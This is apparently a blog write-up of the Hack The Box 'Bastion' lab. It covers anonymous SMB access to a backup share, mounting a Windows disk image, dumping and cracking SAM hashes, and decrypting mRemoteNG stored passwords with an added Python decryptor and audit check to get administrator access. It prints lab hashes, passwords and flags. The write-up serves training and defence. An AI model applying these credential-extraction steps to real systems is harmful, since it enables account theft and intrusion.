Bastion-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: anonymous SMB access, mounting a remote backup disk locally, enumerating application files that hold password information, cracking encrypted passwords

Reference: https://0xdf.gitlab.io/2019/09/07/htb-bastion.html

0x01 Obtaining user access

1. Target IP address: 10.10.10.134

2. Check which ports are open:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate 10000 10.10.10.134

PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49668/tcp open unknown
49670/tcp open unknown

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,135,139,445 -sV -sC --min-rate 10000 10.10.10.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-15 21:49 CST
Nmap scan report for 10.10.10.134
Host is up (0.29s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -19m58s, deviation: 34m36s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-03-15T14:49:20+01:00
| smb2-time:
| date: 2024-03-15T13:49:21
|_ start_date: 2024-03-15T13:33:55

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.20 seconds

3. Check whether SMB allows access without a password

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L \\10.10.10.134 -N

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

4. Next, look at the contents of the Backups share on the SMB service

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.134\\Backups -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Apr 16 18:02:11 2019
.. D 0 Tue Apr 16 18:02:11 2019
note.txt AR 116 Tue Apr 16 18:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 20:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 20:44:02 2019

5638911 blocks of size 4096. 1177045 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> get SDT65CB.tmp
getting file \SDT65CB.tmp of size 0 as SDT65CB.tmp (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> ls
. Dn 0 Fri Feb 22 20:44:02 2019
.. Dn 0 Fri Feb 22 20:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 20:45:32 2019

5638911 blocks of size 4096. 1177045 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> ls
. Dn 0 Fri Feb 22 20:45:32 2019
.. Dn 0 Fri Feb 22 20:45:32 2019
Backup 2019-02-22 124351 Dn 0 Fri Feb 22 20:45:32 2019
Catalog Dn 0 Fri Feb 22 20:45:32 2019
MediaId An 16 Fri Feb 22 20:44:02 2019
SPPMetadataCache Dn 0 Fri Feb 22 20:45:32 2019

5638911 blocks of size 4096. 1177045 blocks available
smb: \WindowsImageBackup\L4mpje-PC\> cd Catalog\
smb: \WindowsImageBackup\L4mpje-PC\Catalog\> ls
. Dn 0 Fri Feb 22 20:45:32 2019
.. Dn 0 Fri Feb 22 20:45:32 2019
BackupGlobalCatalog An 5698 Fri Feb 22 20:44:02 2019
GlobalCatalog An 7440 Fri Feb 22 20:45:32 2019

5638911 blocks of size 4096. 1177045 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Catalog\> get BackupGlobalCatalog
getting file \WindowsImageBackup\L4mpje-PC\Catalog\BackupGlobalCatalog of size 5698 as BackupGlobalCatalog (4.2 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \WindowsImageBackup\L4mpje-PC\Catalog\> get GlobalCatalog
getting file \WindowsImageBackup\L4mpje-PC\Catalog\GlobalCatalog of size 7440 as GlobalCatalog (3.0 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \WindowsImageBackup\L4mpje-PC\Catalog\> cd ../
smb: \WindowsImageBackup\L4mpje-PC\> cd Backup 2019-02-22 124351\
cd \WindowsImageBackup\L4mpje-PC\Backup\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \WindowsImageBackup\L4mpje-PC\> cd MediaId
cd \WindowsImageBackup\L4mpje-PC\MediaId\: NT_STATUS_NOT_A_DIRECTORY
smb: \WindowsImageBackup\L4mpje-PC\> get MediaId
getting file \WindowsImageBackup\L4mpje-PC\MediaId of size 16 as MediaId (0.0 KiloBytes/sec) (average 1.8 KiloBytes/sec)
smb: \WindowsImageBackup\L4mpje-PC\> cd SPPMetadataCache\
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> ls
. Dn 0 Fri Feb 22 20:45:32 2019
.. Dn 0 Fri Feb 22 20:45:32 2019
{cd113385-65ff-4ea2-8ced-5630f6feca8f} An 57848 Fri Feb 22 20:45:32 2019

5638911 blocks of size 4096. 1176991 blocks available
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> cd {cd113385-65ff-4ea2-8ced-5630f6feca8f}
cd \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\{cd113385-65ff-4ea2-8ced-5630f6feca8f}\: NT_STATUS_NOT_A_DIRECTORY
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> ls
. Dn 0 Fri Feb 22 20:45:32 2019
.. Dn 0 Fri Feb 22 20:45:32 2019
{cd113385-65ff-4ea2-8ced-5630f6feca8f} An 57848 Fri Feb 22 20:45:32 2019

5638911 blocks of size 4096. 1176991 blocks available
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> get {cd113385-65ff-4ea2-8ced-5630f6feca8f}
getting file \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\{cd113385-65ff-4ea2-8ced-5630f6feca8f} of size 57848 as {cd113385-65ff-4ea2-8ced-5630f6feca8f} (21.3 KiloBytes/sec) (average 7.1 KiloBytes/sec)
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> cd ./../
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> ls
. Dn 0 Fri Feb 22 20:45:32 2019
.. Dn 0 Fri Feb 22 20:45:32 2019
{cd113385-65ff-4ea2-8ced-5630f6feca8f} An 57848 Fri Feb 22 20:45:32 2019

5638911 blocks of size 4096. 1176991 blocks available
smb: \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\> cd ../../
smb: \WindowsImageBackup\> ls
. Dn 0 Fri Feb 22 20:44:02 2019
.. Dn 0 Fri Feb 22 20:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 20:45:32 2019

5638911 blocks of size 4096. 1176991 blocks available
smb: \WindowsImageBackup\> cd ../
smb: \> ls
. D 0 Tue Apr 16 18:02:11 2019
.. D 0 Tue Apr 16 18:02:11 2019
note.txt AR 116 Tue Apr 16 18:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 20:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 20:44:02 2019

5638911 blocks of size 4096. 1176991 blocks available
smb: \>

5. After some digging, note.txt turned out to contain a hint

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
L4mpje-PC

# Windows image backups can be very large and slow to transfer (as the note warns). Instead of trying to copy it, I will mount the share onto my filesystem.

6. Combining this with the note, the skill needed here is disk mounting and browsing: mount the remote backup directory locally

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
[sudo] kali 的密码:

7. List all files in the share:

┌──(kali㉿offsec)-[~/Desktop]
└─$ find /mnt/ -type f
/mnt/note.txt
/mnt/SDT65CB.tmp
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/BackupSpecs.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
/mnt/WindowsImageBackup/L4mpje-PC/Catalog/BackupGlobalCatalog
/mnt/WindowsImageBackup/L4mpje-PC/Catalog/GlobalCatalog
/mnt/WindowsImageBackup/L4mpje-PC/MediaId
/mnt/WindowsImageBackup/L4mpje-PC/SPPMetadataCache/{cd113385-65ff-4ea2-8ced-5630f6feca8f}

8. Mount the virtual disk files and see what they contain. First, install guestmount and libguestfs-tools (apt install libguestfs-tools); guestmount is a tool for mounting virtual hard disk files on Linux.

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo apt install guestmount

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo apt install libguestfs-tools

9. Now try to mount the two VHD files. The first one fails: my Kali froze outright and the mount directory could not be accessed:

sudo guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2/

10. The second one works and gives access to what looks like the root of a Windows filesystem:

sudo guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2/

11. Because of the mount problems on my side, I could not mount the remote share properly, so I skipped this part. What matters here is that the mounted image is a backup of the Windows system; the next step is to extract the hashes from the SAM inside it.

12. With full access to the filesystem I can reach the registry hive files. These files are locked while the system is running, but that is not a problem on a mounted drive. In the config directory, where the registry hives are stored, I use secretsdump.py to dump the password hashes:

root@kali:/mnt2/Windows/System32/config# secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:e4487d0421e6611a364a5028467e053c:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...

13. This time the hash is cracked with an online cracking site

L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

https://crackstation.net/

bureaulampje

14. Log in remotely over SSH

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh L4mpje@10.10.10.134
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ED25519 key fingerprint is SHA256:2ZbIDKRPlngECX1WSMqnucdOWthIaPG7wQ6mBReac7M.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ED25519) to the list of known hosts.
L4mpje@10.10.10.134's password:

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

l4mpje@BASTION C:\Users\L4mpje>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692

Directory of C:\Users\L4mpje

22-02-2019 13:50 <DIR> .
22-02-2019 13:50 <DIR> ..
22-02-2019 15:26 <DIR> Contacts
22-02-2019 15:27 <DIR> Desktop
22-02-2019 15:26 <DIR> Documents
22-02-2019 15:26 <DIR> Downloads
22-02-2019 15:26 <DIR> Favorites
22-02-2019 15:26 <DIR> Links
22-02-2019 15:26 <DIR> Music
22-02-2019 15:26 <DIR> Pictures
22-02-2019 15:26 <DIR> Saved Games
22-02-2019 15:26 <DIR> Searches
22-02-2019 15:26 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 4.818.972.672 bytes free

l4mpje@BASTION C:\Users\L4mpje>cd Desktop

l4mpje@BASTION C:\Users\L4mpje\Desktop>

15. Grab the first flag

l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692

Directory of C:\Users\L4mpje\Desktop

22-02-2019 15:27 <DIR> .
22-02-2019 15:27 <DIR> ..
15-03-2024 14:34 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 4.818.972.672 bytes free

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
c45f73eef3fd98b1ab10266727a724d1

l4mpje@BASTION C:\Users\L4mpje\Desktop>

0x02 Obtaining system privileges

16. Next, continue enumerating directories and files with the current account

l4mpje@BASTION C:\>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692

Directory of C:\

16-04-2019 11:02 <DIR> Backups
12-09-2016 12:35 <DIR> Logs
22-02-2019 14:42 <DIR> PerfLogs
31-01-2022 17:39 <DIR> Program Files
22-02-2019 14:01 <DIR> Program Files (x86)
22-02-2019 13:50 <DIR> Users
31-01-2022 17:52 <DIR> Windows
0 File(s) 0 bytes
7 Dir(s) 4.818.399.232 bytes free

l4mpje@BASTION C:\>cd "Program Files"

l4mpje@BASTION C:\Program Files>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

l4mpje@BASTION C:\Program Files>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692

Directory of C:\Program Files

31-01-2022 17:39 <DIR> .
31-01-2022 17:39 <DIR> ..
16-04-2019 11:18 <DIR> Common Files
23-02-2019 09:38 <DIR> Internet Explorer
22-02-2019 14:19 <DIR> OpenSSH-Win64
22-02-2019 14:08 <DIR> PackageManagement
31-01-2022 17:39 <DIR> VMware
23-02-2019 10:22 <DIR> Windows Defender
23-02-2019 09:38 <DIR> Windows Mail
23-02-2019 10:22 <DIR> Windows Media Player
16-07-2016 14:23 <DIR> Windows Multimedia Platform
16-07-2016 14:23 <DIR> Windows NT
23-02-2019 10:22 <DIR> Windows Photo Viewer
16-07-2016 14:23 <DIR> Windows Portable Devices
22-02-2019 14:08 <DIR> WindowsPowerShell
0 File(s) 0 bytes
15 Dir(s) 4.818.399.232 bytes free

l4mpje@BASTION C:\Program Files>



l4mpje@BASTION C:\Program Files>cd ../

l4mpje@BASTION C:\>cd "Program Files (x86)"

l4mpje@BASTION C:\Program Files (x86)>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692

Directory of C:\Program Files (x86)

22-02-2019 14:01 <DIR> .
22-02-2019 14:01 <DIR> ..
16-07-2016 14:23 <DIR> Common Files
23-02-2019 09:38 <DIR> Internet Explorer
16-07-2016 14:23 <DIR> Microsoft.NET
22-02-2019 14:01 <DIR> mRemoteNG
23-02-2019 10:22 <DIR> Windows Defender
23-02-2019 09:38 <DIR> Windows Mail
23-02-2019 10:22 <DIR> Windows Media Player
16-07-2016 14:23 <DIR> Windows Multimedia Platform
16-07-2016 14:23 <DIR> Windows NT
23-02-2019 10:22 <DIR> Windows Photo Viewer
16-07-2016 14:23 <DIR> Windows Portable Devices
16-07-2016 14:23 <DIR> WindowsPowerShell
0 File(s) 0 bytes
14 Dir(s) 4.818.399.232 bytes free

l4mpje@BASTION C:\Program Files (x86)>



l4mpje@BASTION C:\Program Files (x86)>cd mRemoteNG

l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692

Directory of C:\Program Files (x86)\mRemoteNG

22-02-2019 14:01 <DIR> .
22-02-2019 14:01 <DIR> ..
18-10-2018 22:31 36.208 ADTree.dll
18-10-2018 22:31 346.992 AxInterop.MSTSCLib.dll
18-10-2018 22:31 83.824 AxInterop.WFICALib.dll
18-10-2018 22:31 2.243.440 BouncyCastle.Crypto.dll
18-10-2018 22:30 71.022 Changelog.txt
18-10-2018 22:30 3.224 Credits.txt
22-02-2019 14:01 <DIR> cs-CZ
22-02-2019 14:01 <DIR> de
22-02-2019 14:01 <DIR> el
22-02-2019 14:01 <DIR> en-US
22-02-2019 14:01 <DIR> es
22-02-2019 14:01 <DIR> es-AR
22-02-2019 14:01 <DIR> Firefox
22-02-2019 14:01 <DIR> fr
18-10-2018 22:31 1.966.960 Geckofx-Core.dll
05-07-2017 00:31 4.482.560 Geckofx-Core.pdb
18-10-2018 22:31 143.728 Geckofx-Winforms.dll
05-07-2017 00:31 259.584 Geckofx-Winforms.pdb
22-02-2019 14:01 <DIR> Help
22-02-2019 14:01 <DIR> hu
22-02-2019 14:01 <DIR> Icons
18-10-2018 22:31 607.088 Interop.MSTSCLib.dll
18-10-2018 22:31 131.440 Interop.WFICALib.dll
22-02-2019 14:01 <DIR> it
22-02-2019 14:01 <DIR> ja-JP
22-02-2019 14:01 <DIR> ko-KR
07-10-2018 12:21 18.326 License.txt
18-10-2018 22:31 283.504 log4net.dll
18-10-2018 22:31 412.528 MagicLibrary.dll
18-10-2018 22:31 1.552.240 mRemoteNG.exe
07-10-2018 12:21 28.317 mRemoteNG.exe.config
18-10-2018 22:30 2.405.888 mRemoteNG.pdb
22-02-2019 14:01 <DIR> nb-NO
22-02-2019 14:01 <DIR> nl
18-10-2018 22:31 451.952 ObjectListView.dll
22-02-2019 14:01 <DIR> pl
22-02-2019 14:01 <DIR> pt
22-02-2019 14:01 <DIR> pt-BR
07-10-2018 12:21 707.952 PuTTYNG.exe
07-10-2018 12:21 887 Readme.txt
18-10-2018 22:31 415.088 Renci.SshNet.dll
22-02-2019 14:01 <DIR> ru
22-02-2019 14:01 <DIR> Schemas
22-02-2019 14:01 <DIR> Themes
22-02-2019 14:01 <DIR> tr-TR
22-02-2019 14:01 <DIR> uk
18-10-2018 22:31 152.432 VncSharp.dll
18-10-2018 22:31 312.176 WeifenLuo.WinFormsUI.Docking.dll
18-10-2018 22:31 55.152 WeifenLuo.WinFormsUI.Docking.ThemeVS2003.dll
18-10-2018 22:31 168.816 WeifenLuo.WinFormsUI.Docking.ThemeVS2012.dll
18-10-2018 22:31 217.968 WeifenLuo.WinFormsUI.Docking.ThemeVS2013.dll
18-10-2018 22:31 243.056 WeifenLuo.WinFormsUI.Docking.ThemeVS2015.dll
22-02-2019 14:01 <DIR> zh-CN
22-02-2019 14:01 <DIR> zh-TW
28 File(s) 17.802.352 bytes
28 Dir(s) 4.818.399.232 bytes free

l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>


l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>type Changelog.txt
1.76.11 (2018-10-18):

Fixes:
------
#1139: Feature "Reconnect to previously opened sessions" not working
#1136: Putty window not maximized

1.76.10 (2018-10-07):

Fixes:
------
#1124: Enabling themes causes an exceptio



C:\Users\L4mpje\AppData\Roaming\mRemoteNG


l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692

Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG

22-02-2019 14:03 <DIR> .
22-02-2019 14:03 <DIR> ..
22-02-2019 14:03 6.316 confCons.xml
22-02-2019 14:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 14:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 14:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 14:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 14:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 14:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 14:03 51 extApps.xml
22-02-2019 14:03 5.217 mRemoteNG.log
22-02-2019 14:03 2.245 pnlLayout.xml
22-02-2019 14:01 <DIR> Themes
14 File(s) 76.577 bytes
3 Dir(s) 4.818.399.232 bytes free

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>

17. The application's data directory contains sensitive information; download the file with SCP

scp 'l4mpje@10.10.10.134:\users\l4mpje\AppData\Roaming\mRemoteNG\confCons.xml' confCons.xml

18. Decrypt the stored passwords with a decryption tool

https://github.com/kmahyyg/mremoteng-decrypt/releases

root@kali:/opt/mremoteng-decrypt# java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7
User Input: OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7
Use default password for cracking...
Decrypted Output: bureaulampje

root@kali:/opt/mremoteng-decrypt# java -jar decipher_mremoteng.jar V22XaC5eW4epRxRgXEM5RjuQe2UNrHaZSGMUenOvA1Cit/z3v1fUfZmGMglsiaICSus+bOwJQ/4AnYAt2AeE8g==
User Input: V22XaC5eW4epRxRgXEM5RjuQe2UNrHaZSGMUenOvA1Cit/z3v1fUfZmGMglsiaICSus+bOwJQ/4AnYAt2AeE8g==
Use default password for cracking...
Decrypted Output: thXLHM96BeKL0ER2
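As an added example (my code, not the kmahyyg tool or mRemoteNG's own), the same decryption done in Python with the cryptography package so the format is visible: mRemoteNG 1.75+ stores base64(salt[16] || nonce[16] || ciphertext || GCM tag[16]), derives a 32-byte AES key with PBKDF2-HMAC-SHA1 (1000 iterations by default) from the master password, and uses the salt as GCM associated data. The defender's point is that unless a custom master password is set the key comes from the built-in default "mR3m", so anyone holding confCons.xml recovers every stored credential; uses_default_master and audit_confcons are audit checks for that. The two ciphertexts are the ones from the output above; the XML fragment and the "custom-master" value are constructed.

```python
import base64
import hashlib
import os
import xml.etree.ElementTree as ET
from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

DEFAULT_MASTER = "mR3m"     # mRemoteNG's built-in master password
SALT_LEN = NONCE_LEN = 16   # both 128-bit in the 1.75+ format
KDF_ITERATIONS = 1000       # mRemoteNG default KdfIterations

def _derive_key(master: str, salt: bytes, iterations: int) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", master.encode("utf-8"), salt, iterations, dklen=32)

def mremoteng_decrypt(blob_b64: str, master: str = DEFAULT_MASTER,
                      iterations: int = KDF_ITERATIONS) -> str:
    """Decrypt one Password="..." attribute value from confCons.xml."""
    raw = base64.b64decode(blob_b64)
    salt, nonce = raw[:SALT_LEN], raw[SALT_LEN:SALT_LEN + NONCE_LEN]
    ct_and_tag = raw[SALT_LEN + NONCE_LEN:]     # AESGCM takes ciphertext||tag
    key = _derive_key(master, salt, iterations)
    # The salt doubles as GCM associated data; a wrong master raises InvalidTag.
    return AESGCM(key).decrypt(nonce, ct_and_tag, salt).decode("utf-8")

def mremoteng_encrypt(plaintext: str, master: str, iterations: int = KDF_ITERATIONS) -> str:
    """Inverse of the above; used here only to build a custom-master test value."""
    salt, nonce = os.urandom(SALT_LEN), os.urandom(NONCE_LEN)
    key = _derive_key(master, salt, iterations)
    ct_and_tag = AESGCM(key).encrypt(nonce, plaintext.encode("utf-8"), salt)
    return base64.b64encode(salt + nonce + ct_and_tag).decode("ascii")

def uses_default_master(blob_b64: str) -> bool:
    """Audit check: does this value decrypt under the default master password?"""
    try:
        mremoteng_decrypt(blob_b64)
        return True
    except InvalidTag:
        return False

def audit_confcons(xml_text: str) -> list:
    """(Name, Username, password recoverable with default master?) per Node."""
    root = ET.fromstring(xml_text)
    return [(n.get("Name"), n.get("Username"),
             bool(n.get("Password")) and uses_default_master(n.get("Password")))
            for n in root.iter("Node")]

# Constructed sample: the two Password values from this box's confCons.xml (shown above).
L4MPJE_BLOB = "OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7"
ADMIN_BLOB = "V22XaC5eW4epRxRgXEM5RjuQe2UNrHaZSGMUenOvA1Cit/z3v1fUfZmGMglsiaICSus+bOwJQ/4AnYAt2AeE8g=="

# Constructed confCons.xml fragment (only the attributes this audit reads).
CONFCONS_SAMPLE = f"""<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" ConfVersion="2.6">
  <Node Name="example-admin-node" Type="Connection" Username="Administrator"
        Hostname="127.0.0.1" Password="{ADMIN_BLOB}" />
</mrng:Connections>"""
```

A confCons.xml whose Password values decrypt under "mR3m" is effectively a plaintext credential store; setting a custom master password in mRemoteNG (Tools > Options > Security) makes uses_default_master return False for every node.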

19. Use the decrypted password to log in directly and grab the final flag

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh administrator@10.10.10.134
administrator@10.10.10.134's password:

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>cd Desktop

administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
ba913835dc8f4a6af5ade06fd923fe41

administrator@BASTION C:\Users\Administrator\Desktop>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/186


Bastion-htb-writeup
https://sh1yan.top/2024/03/15/Bastion-htb-writeup/
Author: shiyan
Published: 15 March 2024
License